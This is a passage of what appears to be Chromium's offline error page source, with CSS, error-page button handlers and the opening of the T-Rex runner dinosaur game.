  background: rgb(189,193,198);
  border-radius: 0.65em;
  height: 0.9em;
  width: 2em;
}

.slow-speed-option .slow-speed-toggle::after {
  background: #fff;
  border-radius: 50%;
  box-shadow: 0 1px 3px 0 rgb(0 0 0 / 40%);
  height: 1.2em;
  position: absolute;
  top: 51%;
  transform: translate(-20%, -50%);
  width: 1.1em;
}

.slow-speed-option [type=checkbox]:focus + .slow-speed-toggle {
  box-shadow: 0 0 8px rgb(94, 158, 214);
  outline: 1px solid rgb(93, 157, 213);
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
  background: var(--google-blue-600);
  opacity: 0.5;
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after {
  background: var(--google-blue-600);
  transform: translate(calc(2em - 90%), -50%);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::before {
  background: rgb(189,193,198);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::after {
  background: var(--google-gray-50);
}

@media (max-width: 420px) {
  #download-button {
    padding-bottom: 12px;
    padding-top: 12px;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
  }

  .snackbar {
    border-radius: 0;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}

@media (max-height: 350px) {
  h1 {
    margin: 0 0 15px;
  }

  .icon-offline {
    margin: 0 0 10px;
  }

  .interstitial-wrapper {
    margin-top: 5%;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

@media (min-width: 420px) and (max-width: 736px) and
       (min-height: 240px) and (max-height: 420px) and
       (orientation:landscape) {
  .interstitial-wrapper {
    margin-bottom: 100px;
  }
}

@media (max-width: 360px) and (max-height: 480px) {
  .offline .interstitial-wrapper {
    padding-top: 60px;
  }

  .offline .runner-container {
    top: 8px;
  }
}

@media (min-height: 240px) and (orientation: landscape) {
  .offline .interstitial-wrapper {
    margin-bottom: 90px;
  }

  .icon-offline {
    margin-bottom: 20px;
  }
}

@media (max-height: 320px) and (orientation: landscape) {
  .icon-offline {
    margin-bottom: 0;
  }

  .offline .runner-container {
    top: 10px;
  }
}

@media (max-width: 240px) {
  button {
    padding-inline-end: 12px;
    padding-inline-start: 12px;
  }

  .interstitial-wrapper {
    overflow: inherit;
    padding: 0 8px;
  }
}

@media (max-width: 120px) {
  button {
    width: auto;
  }
}

.arcade-mode,
.arcade-mode .runner-container,
.arcade-mode .runner-canvas {
  image-rendering: pixelated;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode #buttons,
.arcade-mode #main-content {
  opacity: 0;
  overflow: hidden;
}

.arcade-mode .interstitial-wrapper {
  height: 100vh;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode .runner-container {
  left: 0;
  margin: auto;
  right: 0;
  transform-origin: top center;
  transition: transform 250ms cubic-bezier(0.4, 0, 1, 1) 400ms;
  z-index: 2;
}

@media (prefers-color-scheme: dark) {
  .icon {
    filter: invert(1);
  }

  .offline .runner-canvas {
    filter: invert(1);
  }

  .offline.inverted {
    background-color: var(--background-color);
    filter: invert(0);
  }

  .offline.inverted body {
    background-color: #fff;
  }

  .offline.inverted .offline-runner-live-region {
    color: #fff;
  }

  #suggestions-list a {
    color: var(--link-color);
  }

  #error-information-button {
    filter: invert(0.6);
  }

  .slow-speed-option {
    background: var(--google-gray-800);
    color: var(--google-gray-100);
  }

  .slow-speed-option .slow-speed-toggle::before,
  .slow-speed-option [type=checkbox]:checked:disabled +
    .slow-speed-toggle::before {
     background: rgb(189,193,198);
  }

  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after,
  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
    background: var(--google-blue-300);
  }
}
</style>
  <script>// Copyright 2013 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @typedef {{
 *   downloadButtonClick: function(),
 *   reloadButtonClick: function(string),
 *   detailsButtonClick: function(),
 *   diagnoseErrorsButtonClick: function(),
 *   trackEasterEgg: function(),
 *   updateEasterEggHighScore: function(number),
 *   resetEasterEggHighScore: function(),
 *   launchOfflineItem: function(string, string),
 *   savePageForLater: function(),
 *   cancelSavePage: function(),
 *   listVisibilityChange: function(boolean),
 * }}
 */
// eslint-disable-next-line no-var
var errorPageController;

const HIDDEN_CLASS = 'hidden';

// Decodes a UTF16 string that is encoded as base64.
function decodeUTF16Base64ToString(encoded_text) {
  const data = atob(encoded_text);
  let result = '';
  for (let i = 0; i < data.length; i += 2) {
    result +=
        String.fromCharCode(data.charCodeAt(i) * 256 + data.charCodeAt(i + 1));
  }
  return result;
}

function toggleHelpBox() {
  const helpBoxOuter = document.getElementById('details');
  helpBoxOuter.classList.toggle(HIDDEN_CLASS);
  const detailsButton = document.getElementById('details-button');
  if (helpBoxOuter.classList.contains(HIDDEN_CLASS)) {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.detailsText;
  } else {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.hideDetailsText;
  }

  // Details appears over the main content on small screens.
  if (mobileNav) {
    document.getElementById('main-content').classList.toggle(HIDDEN_CLASS);
    const runnerContainer = document.querySelector('.runner-container');
    if (runnerContainer) {
      runnerContainer.classList.toggle(HIDDEN_CLASS);
    }
  }
}

function diagnoseErrors() {
  if (window.errorPageController) {
    errorPageController.diagnoseErrorsButtonClick();
  }
}

// Subframes use a different layout but the same html file.  This is to make it
// easier to support platforms that load the error page via different
// mechanisms (Currently just iOS). We also use the subframe style for portals
// as they are embedded like subframes and can't be interacted with by the user.
let isSubFrame = false;
if (window.top.location !== window.location || window.portalHost) {
  document.documentElement.setAttribute('subframe', '');
  isSubFrame = true;
}

// Re-renders the error page using |strings| as the dictionary of values.
// Used by NetErrorTabHelper to update DNS error pages with probe results.
function updateForDnsProbe(strings) {
  const context = new JsEvalContext(strings);
  jstProcess(context, document.getElementById('t'));
  onDocumentLoadOrUpdate();
}

// Adds an icon class to the list and removes classes previously set.
function updateIconClass(newClass) {
  const frameSelector = isSubFrame ? '#sub-frame-error' : '#main-frame-error';
  const iconEl = document.querySelector(frameSelector + ' .icon');

  if (iconEl.classList.contains(newClass)) {
    return;
  }

  iconEl.className = 'icon ' + newClass;
}

// Implements button clicks.  This function is needed during the transition
// between implementing these in trunk chromium and implementing them in iOS.
function reloadButtonClick(url) {
  if (window.errorPageController) {
    // 

    // 
    errorPageController.reloadButtonClick();
    // 
  } else {
    window.location = url;
  }
}

function downloadButtonClick() {
  if (window.errorPageController) {
    errorPageController.downloadButtonClick();
    const downloadButton = document.getElementById('download-button');
    downloadButton.disabled = true;
    /** @suppress {missingProperties} */
    downloadButton.textContent = downloadButton.disabledText;

    document.getElementById('download-link-wrapper')
        .classList.add(HIDDEN_CLASS);
    document.getElementById('download-link-clicked-wrapper')
        .classList.remove(HIDDEN_CLASS);
  }
}

function detailsButtonClick() {
  if (window.errorPageController) {
    errorPageController.detailsButtonClick();
  }
}

let primaryControlOnLeft = true;
// clang-format off
// 
// clang-format on
primaryControlOnLeft = false;
// 

function setAutoFetchState(scheduled, can_schedule) {
  document.getElementById('cancel-save-page-button')
      .classList.toggle(HIDDEN_CLASS, !scheduled);
  document.getElementById('save-page-for-later-button')
      .classList.toggle(HIDDEN_CLASS, scheduled || !can_schedule);
}

function savePageLaterClick() {
  errorPageController.savePageForLater();
  // savePageForLater will eventually trigger a call to setAutoFetchState() when
  // it completes.
}

function cancelSavePageClick() {
  errorPageController.cancelSavePage();
  // setAutoFetchState is not called in response to cancelSavePage(), so do it
  // now.
  setAutoFetchState(false, true);
}

function toggleErrorInformationPopup() {
  document.getElementById('error-information-popup-container')
      .classList.toggle(HIDDEN_CLASS);
}

function launchOfflineItem(itemID, name_space) {
  errorPageController.launchOfflineItem(itemID, name_space);
}

function launchDownloadsPage() {
  errorPageController.launchDownloadsPage();
}

function getIconForSuggestedItem(item) {
  // Note: |item.content_type| contains the enum values from
  // chrome::mojom::AvailableContentType.
  switch (item.content_type) {
    case 1:  // kVideo
      return 'image-video';
    case 2:  // kAudio
      return 'image-music-note';
    case 0:  // kPrefetchedPage
    case 3:  // kOtherPage
      return 'image-earth';
  }
  return 'image-file';
}

function getSuggestedContentDiv(item, index) {
  // Note: See AvailableContentToValue in available_offline_content_helper.cc
  // for the data contained in an |item|.
  // TODO(carlosk): Present |snippet_base64| when that content becomes
  // available.
  let thumbnail = '';
  const extraContainerClasses = [];
  // html_inline.py will try to replace src attributes with data URIs using a
  // simple regex. The following is obfuscated slightly to avoid that.
  const source = 'src';
  if (item.thumbnail_data_uri) {
    extraContainerClasses.push('suggestion-with-image');
    thumbnail = `<img ${source}="${item.thumbnail_data_uri}">`;
  } else {
    extraContainerClasses.push('suggestion-with-icon');
    const iconClass = getIconForSuggestedItem(item);
    thumbnail = `<div><img class="${iconClass}"></div>`;
  }

  let favicon = '';
  if (item.favicon_data_uri) {
    favicon = `<img ${source}="${item.favicon_data_uri}">`;
  } else {
    extraContainerClasses.push('no-favicon');
  }

  if (!item.attribution_base64) {
    extraContainerClasses.push('no-attribution');
  }

  return `
  <div class="offline-content-suggestion ${extraContainerClasses.join(' ')}"
    onclick="launchOfflineItem('${item.ID}', '${item.name_space}')">
      <div class="offline-content-suggestion-texts">
        <div id="offline-content-suggestion-title-${index}"
             class="offline-content-suggestion-title">
        </div>
        <div class="offline-content-suggestion-attribution-freshness">
          <div id="offline-content-suggestion-favicon-${index}"
               class="offline-content-suggestion-favicon">
            ${favicon}
          </div>
          <div id="offline-content-suggestion-attribution-${index}"
               class="offline-content-suggestion-attribution">
          </div>
          <div class="offline-content-suggestion-freshness">
            ${item.date_modified}
          </div>
          <div class="offline-content-suggestion-pin-spacer"></div>
          <div class="offline-content-suggestion-pin"></div>
        </div>
      </div>
      <div class="offline-content-suggestion-thumbnail">
        ${thumbnail}
      </div>
  </div>`;
}

/**
 * @typedef {{
 *   ID: string,
 *   name_space: string,
 *   title_base64: string,
 *   snippet_base64: string,
 *   date_modified: string,
 *   attribution_base64: string,
 *   thumbnail_data_uri: string,
 *   favicon_data_uri: string,
 *   content_type: number,
 * }}
 */
let AvailableOfflineContent;

// Populates a list of suggested offline content.
// Note: For security reasons all content downloaded from the web is considered
// unsafe and must be securely handled to be presented on the dino page. Images
// have already been safely re-encoded but textual content -- like title and
// attribution -- must be properly handled here.
// @param {boolean} isShown
// @param {Array<AvailableOfflineContent>} suggestions
function offlineContentAvailable(isShown, suggestions) {
  if (!suggestions || !loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const suggestionsHTML = [];
  for (let index = 0; index < suggestions.length; index++) {
    suggestionsHTML.push(getSuggestedContentDiv(suggestions[index], index));
  }

  document.getElementById('offline-content-suggestions').innerHTML =
      suggestionsHTML.join('\n');

  // Sets textual web content using |textContent| to make sure it's handled as
  // plain text.
  for (let index = 0; index < suggestions.length; index++) {
    document.getElementById(`offline-content-suggestion-title-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].title_base64);
    document.getElementById(`offline-content-suggestion-attribution-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].attribution_base64);
  }

  const contentListElement = document.getElementById('offline-content-list');
  if (document.dir === 'rtl') {
    contentListElement.classList.add('is-rtl');
  }
  contentListElement.hidden = false;
  // The list is configured as hidden by default. Show it if needed.
  if (isShown) {
    toggleOfflineContentListVisibility(false);
  }
}

function toggleOfflineContentListVisibility(updatePref) {
  if (!loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const contentListElement = document.getElementById('offline-content-list');
  const isVisible = !contentListElement.classList.toggle('list-hidden');

  if (updatePref && window.errorPageController) {
    errorPageController.listVisibilityChanged(isVisible);
  }
}

// Called on document load, and from updateForDnsProbe().
function onDocumentLoadOrUpdate() {
  const downloadButtonVisible = loadTimeData.valueExists('downloadButton') &&
      loadTimeData.getValue('downloadButton').msg;
  const detailsButton = document.getElementById('details-button');

  // If offline content suggestions will be visible, the usual buttons will not
  // be presented.
  const offlineContentVisible =
      loadTimeData.valueExists('suggestedOfflineContentPresentation');
  if (offlineContentVisible) {
    document.querySelector('.nav-wrapper').classList.add(HIDDEN_CLASS);
    detailsButton.classList.add(HIDDEN_CLASS);

    document.getElementById('download-link').hidden = !downloadButtonVisible;
    document.getElementById('download-links-wrapper')
        .classList.remove(HIDDEN_CLASS);
    document.getElementById('error-information-popup-container')
        .classList.add('use-popup-container', HIDDEN_CLASS);
    document.getElementById('error-information-button')
        .classList.remove(HIDDEN_CLASS);
  }

  const attemptAutoFetch = loadTimeData.valueExists('attemptAutoFetch') &&
      loadTimeData.getValue('attemptAutoFetch');

  const reloadButtonVisible = loadTimeData.valueExists('reloadButton') &&
      loadTimeData.getValue('reloadButton').msg;

  const reloadButton = document.getElementById('reload-button');
  const downloadButton = document.getElementById('download-button');
  if (reloadButton.style.display === 'none' &&
      downloadButton.style.display === 'none') {
    detailsButton.classList.add('singular');
  }

  // Show or hide control buttons.
  const controlButtonDiv = document.getElementById('control-buttons');
  controlButtonDiv.hidden =
      offlineContentVisible || !(reloadButtonVisible || downloadButtonVisible);

  const iconClass = loadTimeData.valueExists('iconClass') &&
      loadTimeData.getValue('iconClass');

  updateIconClass(iconClass);

  if (!isSubFrame && iconClass === 'icon-offline') {
    document.documentElement.classList.add('offline');
    new Runner('.interstitial-wrapper');
  }
}

function onDocumentLoad() {
  // Sets up the proper button layout for the current platform.
  const buttonsDiv = document.getElementById('buttons');
  if (primaryControlOnLeft) {
    buttonsDiv.classList.add('suggested-left');
  } else {
    buttonsDiv.classList.add('suggested-right');
  }

  onDocumentLoadOrUpdate();
}

document.addEventListener('DOMContentLoaded', onDocumentLoad);
</script>
  <script>// Copyright 2015 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

let mobileNav = false;

/**
 * For small screen mobile the navigation buttons are moved
 * below the advanced text.
 */
function onResize() {
  const helpOuterBox = document.querySelector('#details');
  const mainContent = document.querySelector('#main-content');
  const mediaQuery = '(min-width: 240px) and (max-width: 420px) and ' +
      '(min-height: 401px), ' +
      '(max-height: 560px) and (min-height: 240px) and ' +
      '(min-width: 421px)';

  const detailsHidden = helpOuterBox.classList.contains(HIDDEN_CLASS);
  const runnerContainer = document.querySelector('.runner-container');

  // Check for change in nav status.
  if (mobileNav !== window.matchMedia(mediaQuery).matches) {
    mobileNav = !mobileNav;

    // Handle showing the top content / details sections according to state.
    if (mobileNav) {
      mainContent.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      helpOuterBox.classList.toggle(HIDDEN_CLASS, detailsHidden);
      if (runnerContainer) {
        runnerContainer.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      }
    } else if (!detailsHidden) {
      // Non mobile nav with visible details.
      mainContent.classList.remove(HIDDEN_CLASS);
      helpOuterBox.classList.remove(HIDDEN_CLASS);
      if (runnerContainer) {
        runnerContainer.classList.remove(HIDDEN_CLASS);
      }
    }
  }
}

function setupMobileNav() {
  window.addEventListener('resize', onResize);
  onResize();
}

document.addEventListener('DOMContentLoaded', setupMobileNav);
</script>
  <script>// Copyright 2014 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * T-Rex runner.
 * @param {string} outerContainerId Outer containing element id.
 * @param {!Object=} opt_config
 * @constructor
 * @implements {EventListener}
 * @export
 */
function Runner(outerContainerId, opt_config) {
  // Singleton
  if (Runner.instance_) {
    return Runner.instance_;
  }
  Runner.instance_ = this;

  this.outerContainerEl = document.querySelector(outerContainerId);
  this.containerEl = null;
  this.snackbarEl = null;
  // A div to intercept touch events. Only set while (playing && useTouch).
  this.touchController = null;

  this.config = opt_config || Object.assign(Runner.config, Runner.normalConfig);
  // Logical dimensions of the container.
  this.dimensions = Runner.defaultDimensions;

  this.gameType = null;
  Runner.spriteDefinition = Runner.spriteDefinitionByType['original'];

  this.altGameImageSprite = null;
  this.altGameModeActive = false;
  this.altGameModeFlashTimer = null;
  this.fadeInTimer = 0;

  this.canvas = null;
  this.canvasCtx = null;

  this.tRex = null;

  this.distanceMeter = null;
  this.distanceRan = 0;

  this.highestScore = 0;
  this.syncHighestScore = false;

  this.time = 0;
  this.runningTime = 0;
  this.msPerFrame = 1000 / FPS;
  this.currentSpeed = this.config.SPEED;
  Runner.slowDown = false;

  this.obstacles = [];

  this.activated = false; // Whether the easter egg has been activated.
  this.playing = false; // Whether the game is currently in play state.
  this.crashed = false;
  this.paused = false;
  this.inverted = false;
  this.invertTimer = 0;
  this.resizeTimerId_ = null;

  this.playCount = 0;

  // Sound FX.
  this.audioBuffer = null;

  /** @type {Object} */
  this.soundFx = {};
  this.generatedSoundFx = null;

  // Global web audio context for playing sounds.
  this.audioContext = null;

  // Images.
  this.images = {};
  this.imagesLoaded = 0;

  // Gamepad state.
  this.pollingGamepads = false;
  this.gamepadIndex = undefined;
  this.previousGamepad = null;

  if (this.isDisabled()) {
    this.setupDisabledRunner();
  } else {
    if (Runner.isAltGameModeEnabled()) {
      this.initAltGameType();
      Runner.gameType = this.gameType;
    }
    this.loadImages();

    window['initializeEasterEggHighScore'] =
        this.initializeHighScore.bind(this);
  }
}

/**
 * Default game width.
 * @const
 */
const DEFAULT_WIDTH = 600;

/**
 * Frames per second.
 * @const
 */
const FPS = 60;

/** @const */
const IS_HIDPI = window.devicePixelRatio > 1;

/** @const */
const IS_IOS = /CriOS/.test(window.navigator.userAgent);

/** @const */
const IS_MOBILE = /Android/.test(window.navigator.userAgent) || IS_IOS;

/** @const */
const IS_RTL = document.querySelector('html').dir == 'rtl';

/** @const */
const ARCADE_MODE_URL = 'chrome://dino/';

/** @const */
const RESOURCE_POSTFIX = 'offline-resources-';

/** @const */
const A11Y_STRINGS = {
  ariaLabel: 'dinoGameA11yAriaLabel',
  description: 'dinoGameA11yDescription',
  gameOver: 'dinoGameA11yGameOver',
  highScore: 'dinoGameA11yHighScore',
  jump: 'dinoGameA11yJump',
  started: 'dinoGameA11yStartGame',
  speedLabel: 'dinoGameA11ySpeedToggle',
};

/**
 * Default game configuration.
 * Shared config for all  versions of the game. Additional parameters are
 * defined in Runner.normalConfig and Runner.slowConfig.
 */
Runner.config = {
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  BG_CLOUD_SPEED: 0.2,
  BOTTOM_PAD: 10,
  // Scroll Y threshold at which the game can be activated.
  CANVAS_IN_VIEW_OFFSET: -10,
  CLEAR_TIME: 3000,
  CLOUD_FREQUENCY: 0.5,
  FADE_DURATION: 1,
  FLASH_DURATION: 1000,
  GAMEOVER_CLEAR_TIME: 1200,
  INITIAL_JUMP_VELOCITY: 12,
  INVERT_FADE_DURATION: 12000,
  MAX_BLINK_COUNT: 3,
  MAX_CLOUDS: 6,
  MAX_OBSTACLE_LENGTH: 3,
  MAX_OBSTACLE_DUPLICATION: 2,
  RESOURCE_TEMPLATE_ID: 'audio-resources',
  SPEED: 6,
  SPEED_DROP_COEFFICIENT: 3,
  ARCADE_MODE_INITIAL_TOP_POSITION: 35,
  ARCADE_MODE_TOP_POSITION_PERCENT: 0.1,
};

Runner.normalConfig = {
  ACCELERATION: 0.001,
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  GAP_COEFFICIENT: 0.6,
  INVERT_DISTANCE: 700,
  MAX_SPEED: 13,
  MOBILE_SPEED_COEFFICIENT: 1.2,
  SPEED: 6,
};


Runner.slowConfig = {
  ACCELERATION: 0.0005,
  AUDIOCUE_PROXIMITY_THRESHOLD: 170,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 220,
  GAP_COEFFICIENT: 0.3,
  INVERT_DISTANCE: 350,
  MAX_SPEED: 9,
  MOBILE_SPEED_COEFFICIENT: 1.5,
  SPEED: 4.2,
};


/**
 * Default dimensions.
 */
Runner.defaultDimensions = {
  WIDTH: DEFAULT_WIDTH,
  HEIGHT: 150,
};


/**
 * CSS class names.
 * @enum {string}
 */
Runner.classes = {
  ARCADE_MODE: 'arcade-mode',
  CANVAS: 'runner-canvas',
  CONTAINER: 'runner-container',
  CRASHED: 'crashed',
  ICON: 'icon-offline',
  INVERTED: 'inverted',
  SNACKBAR: 'snackbar',
  SNACKBAR_SHOW: 'snackbar-show',
  TOUCH_CONTROLLER: 'controller',
};


/**
 * Sound FX. Reference to the ID of the audio tag on interstitial page.
 * @enum {string}
 */
Runner.sounds = {
  BUTTON_PRESS: 'offline-sound-press',
  HIT: 'offline-sound-hit',
  SCORE: 'offline-sound-reached',
};


/**
 * Key code mapping.
 * @enum {Object}
 */
Runner.keycodes = {
  JUMP: {'38': 1, '32': 1},  // Up, spacebar
  DUCK: {'40': 1},           // Down
  RESTART: {'13': 1},        // Enter
};


/**
 * Runner event names.
 * @enum {string}
 */
Runner.events = {
  ANIM_END: 'webkitAnimationEnd',
  CLICK: 'click',
  KEYDOWN: 'keydown',
  KEYUP: 'keyup',
  POINTERDOWN: 'pointerdown',
  POINTERUP: 'pointerup',
  RESIZE: 'resize',
  TOUCHEND: 'touchend',
  TOUCHSTART: 'touchstart',
  VISIBILITY: 'visibilitychange',
  BLUR: 'blur',
  FOCUS: 'focus',
  LOAD: 'load',
  GAMEPADCONNECTED: 'gamepadconnected',
};

Runner.prototype = {
  /**
   * Initialize alternative game type.
   */
  initAltGameType() {
    if (GAME_TYPE.length > 0) {
      this.gameType = loadTimeData && loadTimeData.valueExists('altGameType') ?
          GAME_TYPE[parseInt(loadTimeData.getValue('altGameType'), 10) - 1] :
          '';
    }
  },

  /**
   * Whether the easter egg has been disabled. CrOS enterprise enrolled devices.
   * @return {boolean}
   */
  isDisabled() {
    return loadTimeData && loadTimeData.valueExists('disabledEasterEgg');
  },

  /**
   * For disabled instances, set up a snackbar with the disabled message.
   */
  setupDisabledRunner() {
    this.containerEl = document.createElement('div');
    this.containerEl.className = Runner.classes.SNACKBAR;
    this.containerEl.textContent = loadTimeData.getValue('disabledEasterEgg');
    this.outerContainerEl.appendChild(this.containerEl);

    // Show notification when the activation key is pressed.
    document.addEventListener(Runner.events.KEYDOWN, function(e) {
      if (Runner.keycodes.JUMP[e.keyCode]) {
        this.containerEl.classList.add(Runner.classes.SNACKBAR_SHOW);
        document.querySelector('.icon').classList.add('icon-disabled');
      }
    }.bind(this));
  },

  /**
   * Setting individual settings for debugging.
   * @param {string} setting
   * @param {number|string} value
   */
  updateConfigSetting(setting, value) {
    if (setting in this.config && value !== undefined) {
      this.config[setting] = value;

      switch (setting) {
        case 'GRAVITY':
        case 'MIN_JUMP_HEIGHT':
        case 'SPEED_DROP_COEFFICIENT':
          this.tRex.config[setting] = value;
          break;
        case 'INITIAL_JUMP_VELOCITY':
          this.tRex.setJumpVelocity(value);
          break;
        case 'SPEED':
          this.setSpeed(/** @type {number} */ (value));
          break;
      }
    }
  },

  /**
   * Creates an on page image element from the base 64 encoded string source.
   * @param {string} resourceName Name in data object,
   * @return {HTMLImageElement} The created element.
   */
  createImageElement(resourceName) {
    const imgSrc = loadTimeData && loadTimeData.valueExists(resourceName) ?
        loadTimeData.getString(resourceName) :
        null;

    if (imgSrc) {
      const el =
          /** @type {HTMLImageElement} */ (document.createElement('img'));
      el.id = resourceName;
      el.src = imgSrc;
      document.getElementById('offline-resources').appendChild(el);
      return el;
    }
    return null;
  },

  /**
   * Cache the appropriate image sprite from the page and get the sprite sheet
   * definition.
   */
  loadImages() {
    let scale = '1x';
    this.spriteDef = Runner.spriteDefinition.LDPI;
    if (IS_HIDPI) {
      scale = '2x';
      this.spriteDef = Runner.spriteDefinition.HDPI;
    }

    Runner.imageSprite = /** @type {HTMLImageElement} */
        (document.getElementById(RESOURCE_POSTFIX + scale));

    if (this.gameType) {
      Runner.altGameImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameSpecificImage' + scale));
      Runner.altCommonImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameCommonImage' + scale));
    }
    Runner.origImageSprite = Runner.imageSprite;

    // Disable the alt game mode if the sprites can't be loaded.
    if (!Runner.altGameImageSprite || !Runner.altCommonImageSprite) {
      Runner.isAltGameModeEnabled = () => false;
      this.altGameModeActive = false;
    }

    if (Runner.imageSprite.complete) {
      this.init();
    } else {
      // If the images are not yet loaded, add a listener.
      Runner.imageSprite.addEventListener(Runner.events.LOAD,
          this.init.bind(this));
    }
  },

  /**
   * Load and decode base 64 encoded sounds.
   */
  loadSounds() {
    if (!IS_IOS) {
      this.audioContext = new AudioContext();

      const resourceTemplate =
          document.getElementById(this.config.RESOURCE_TEMPLATE_ID).content;

      for (const sound in Runner.sounds) {
        let soundSrc =
            resourceTemplate.getElementById(Runner.sounds[sound]).src;
        soundSrc = soundSrc.substr(soundSrc.indexOf(',') + 1);
        const buffer = decodeBase64ToArrayBuffer(soundSrc);

        // Async, so no guarantee of order in array.
        this.audioContext.decodeAudioData(buffer, function(index, audioData) {
            this.soundFx[index] = audioData;
          }.bind(this, sound));
      }
    }
  },

  /**
   * Sets the game speed. Adjust the speed accordingly if on a smaller screen.
   * @param {number=} opt_speed
   */
  setSpeed(opt_speed) {
    const speed = opt_speed || this.currentSpeed;

    // Reduce the speed on smaller mobile screens.
    if (this.dimensions.WIDTH < DEFAULT_WIDTH) {
      const mobileSpeed = Runner.slowDown ? speed :
                                            speed * this.dimensions.WIDTH /
              DEFAULT_WIDTH * this.config.MOBILE_SPEED_COEFFICIENT;
      this.currentSpeed = mobileSpeed > speed ? speed : mobileSpeed;
    } else if (opt_speed) {
      this.currentSpeed = opt_speed;
    }
  },

  /**
   * Game initialiser.
   */
  init() {
    // Hide the static icon.
    document.querySelector('.' + Runner.classes.ICON).style.visibility =
        'hidden';

    this.adjustDimensions();
    this.setSpeed();

    const ariaLabel = getA11yString(A11Y_STRINGS.ariaLabel);
    this.containerEl = document.createElement('div');
    this.containerEl.setAttribute('role', IS_MOBILE ? 'button' : 'application');
    this.containerEl.setAttribute('tabindex', '0');
    this.containerEl.setAttribute('title', ariaLabel);

    this.containerEl.className = Runner.classes.CONTAINER;

    // Player canvas container.
    this.canvas = createCanvas(this.containerEl, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);

    // Live region for game status updates.
    this.a11yStatusEl = document.createElement('span');
    this.a11yStatusEl.className = 'offline-runner-live-region';
    this.a11yStatusEl.setAttribute('aria-live', 'assertive');
    this.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl = this.a11yStatusEl;

    // Add checkbox to slow down the game.
    this.slowSpeedCheckboxLabel = document.createElement('label');
    this.slowSpeedCheckboxLabel.className = 'slow-speed-option hidden';
    this.slowSpeedCheckboxLabel.textContent =
        getA11yString(A11Y_STRINGS.speedLabel);

    this.slowSpeedCheckbox = document.createElement('input');
    this.slowSpeedCheckbox.setAttribute('type', 'checkbox');
    this.slowSpeedCheckbox.setAttribute(
        'title', getA11yString(A11Y_STRINGS.speedLabel));
    this.slowSpeedCheckbox.setAttribute('tabindex', '0');
    this.slowSpeedCheckbox.setAttribute('checked', 'checked');

    this.slowSpeedToggleEl = document.createElement('span');
    this.slowSpeedToggleEl.className = 'slow-speed-toggle';

    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedCheckbox);
    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedToggleEl);

    if (IS_IOS) {
      this.outerContainerEl.appendChild(this.a11yStatusEl);
    } else {
      this.containerEl.appendChild(this.a11yStatusEl);
    }

    announcePhrase(getA11yString(A11Y_STRINGS.description));

    this.generatedSoundFx = new GeneratedSoundFx();

    this.canvasCtx =
        /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
    this.canvasCtx.fillStyle = '#f7f7f7';
    this.canvasCtx.fill();
    Runner.updateCanvasScaling(this.canvas);

    // Horizon contains clouds, obstacles and the ground.
    this.horizon = new Horizon(this.canvas, this.spriteDef, this.dimensions,
        this.config.GAP_COEFFICIENT);

    // Distance meter
    this.distanceMeter = new DistanceMeter(this.canvas,
          this.spriteDef.TEXT_SPRITE, this.dimensions.WIDTH);

    // Draw t-rex
    this.tRex = new Trex(this.canvas, this.spriteDef.TREX);

    this.outerContainerEl.appendChild(this.containerEl);
    this.outerContainerEl.appendChild(this.slowSpeedCheckboxLabel);

    this.startListening();
    this.update();

    window.addEventListener(Runner.events.RESIZE,
        this.debounceResize.bind(this));

    // Handle dark mode
    const darkModeMediaQuery =
        window.matchMedia('(prefers-color-scheme: dark)');
    this.isDarkMode = darkModeMediaQuery && darkModeMediaQuery.matches;
    darkModeMediaQuery.addListener((e) => {
      this.isDarkMode = e.matches;
    });
  },

  /**
   * Create the touch controller. A div that covers whole screen.
   */
  createTouchController() {
    this.touchController = document.createElement('div');
    this.touchController.className = Runner.classes.TOUCH_CONTROLLER;
    this.touchController.addEventListener(Runner.events.TOUCHSTART, this);
    this.touchController.addEventListener(Runner.events.TOUCHEND, this);
    this.outerContainerEl.appendChild(this.touchController);
  },

  /**
   * Debounce the resize event.
   */
  debounceResize() {
    if (!this.resizeTimerId_) {
      this.resizeTimerId_ =
          setInterval(this.adjustDimensions.bind(this), 250);
    }
  },

  /**
   * Adjust game space dimensions on resize.
   */
  adjustDimensions() {
    clearInterval(this.resizeTimerId_);
    this.resizeTimerId_ = null;

    const boxStyles = window.getComputedStyle(this.outerContainerEl);
    const padding = Number(boxStyles.paddingLeft.substr(0,
        boxStyles.paddingLeft.length - 2));

    this.dimensions.WIDTH = this.outerContainerEl.offsetWidth - padding * 2;
    if (this.isArcadeMode()) {
      this.dimensions.WIDTH = Math.min(DEFAULT_WIDTH, this.dimensions.WIDTH);
      if (this.activated) {
